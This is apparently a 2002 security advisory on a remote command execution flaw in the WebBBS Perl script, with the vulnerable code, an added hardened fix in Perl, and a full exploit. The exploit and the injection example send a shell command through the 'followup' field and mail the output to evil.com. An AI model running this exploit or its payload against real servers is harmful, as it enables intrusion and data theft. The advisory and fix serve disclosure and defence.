19th Jun 2002 [SBWID-5469]
COMMAND
WebBBS remote command execution
SYSTEMS AFFECTED
All versions as of (19 June 2002)
PROBLEM
In Nerf gr0up [http://www.nerf.ru] advisory [#7]:
The WebBBS script allows command execution on the server. The script does no
input filtering, and because of this remote command execution is possible. The
vulnerable code is shown below:
webbbs_post.pl:
...
if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
...
if ($followup) {
...
$subdir = "bbs".int($followup/1000);
open (FOLLOWUP,"$dir/$subdir/$followup");
...
Just change the value of the $followup variable, e.g. "followup=10" to
"followup=10;uname -a|mail zlo@evil.com|", to exploit this vulnerability.
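The root cause is the two-argument open: a filename ending in "|" is treated as a pipe, so whatever is in $followup runs as a shell command. As an added example (not code from WebBBS or from the Nerf advisory), the fragment below shows a hardened replacement for that open: the message id is accepted only as a plain decimal number, the file is opened with the three-argument form so a trailing "|" can never be read as a pipe, and constructed inputs show which values the check refuses. The data root $dir and the bbs<N>/<id> layout are assumptions, created in a temporary directory so the script runs offline.

```perl
#!/usr/bin/perl
# Added example, not part of WebBBS or the Nerf advisory.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Accept only a plain decimal message number. Shell metacharacters, "../"
# and a trailing "|" are all rejected before the value reaches open().
sub valid_followup {
    my ($value) = @_;
    return (defined $value && $value =~ /\A[0-9]{1,9}\z/) ? 1 : 0;
}

# Hardened counterpart of the advisory's open(FOLLOWUP,"$dir/$subdir/$followup").
# Returns ($fh, undef) on success or (undef, $reason) on failure. The explicit
# "<" mode of the three-argument open never treats the name as a pipe, so even
# a bypassed check could not turn the path into a command.
sub open_followup {
    my ($dir, $followup) = @_;
    return (undef, "invalid followup id") unless valid_followup($followup);
    my $subdir = "bbs" . int($followup / 1000);
    my $path   = "$dir/$subdir/$followup";
    return (undef, "no such message") unless -f $path;
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    return ($fh, undef);
}

# Constructed inputs: a valid id and the shapes of value the check must refuse.
for my $id ('10', '10|', '10;x|', '../../etc/passwd', '10abc') {
    printf "%-20s %s\n", $id, valid_followup($id) ? "accepted" : "rejected";
}

# Constructed data root (assumed layout $dir/bbs<N>/<id>) to show the open.
my $dir = tempdir(CLEANUP => 1);
mkdir "$dir/bbs0" or die "mkdir: $!";
open(my $w, '>', "$dir/bbs0/10") or die "create: $!";
print $w "message 10 body\n";
close $w;

for my $id ('10', '10|') {
    my ($fh, $err) = open_followup($dir, $id);
    if ($fh) { print "opened $id: ", scalar <$fh>; close $fh; }
    else     { print "refused $id: $err\n"; }
}
```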
Exploit
=======
#!/usr/bin/perl
#
# nerF gr0up
#
# exploit code for
# WebBBS by Darryl C. Burgdorf
# all versions up to 5.00 are vulnerable
#
#
# this is an exploitation of the "followup" bug.
# it allows a remote attacker to execute shell commands.
# you can find the WebBBS script at http://awsd.com/scripts/webbbs/
#
# 06.06.2002
# btr // nerf
# nerf.ru
use IO::Socket;
srand();
$script = "/cgi-bin/webbbs/webbbs_config.pl";
$command = "uname -a|mail zlo@evil.com";
$host = "localhost";
$port = 80;
$content = "$content" . "name=" . rand(254);
$content = "$content" . "&email=" . rand(254);
$content = "$content" . "&subject=" . rand(254);
$content = "$content" . "&body=" . rand(254);
$content = "$content" . "&followup=" . rand(254) . "|$command|";
$content_length = length($content);
$content_type = "application/x-www-form-urlencoded";
if ($ARGV[0]) {$command=$ARGV[0];}
if ($ARGV[1]) {$host=$ARGV[1];}
if ($ARGV[2]) {$script=$ARGV[2];}
$buf = "POST " . "$script" . "?post HTTP/1.0\n";
$buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
$buf = "$buf" . "$content_length\r\n\r\n$content";
print "\tnerF gr0up\n";
print "exploit: WebBBS (awsd.com), version up to 5.00\n";
print "sent:\n$buf\n";
if($socket = IO::Socket::INET->new("$host:$port")){
print $socket "$buf";
read($socket,$buf,1500);
print "received:\n$buf\n";
}
SOLUTION
Check:
http://awsd.com/scripts/webbbs/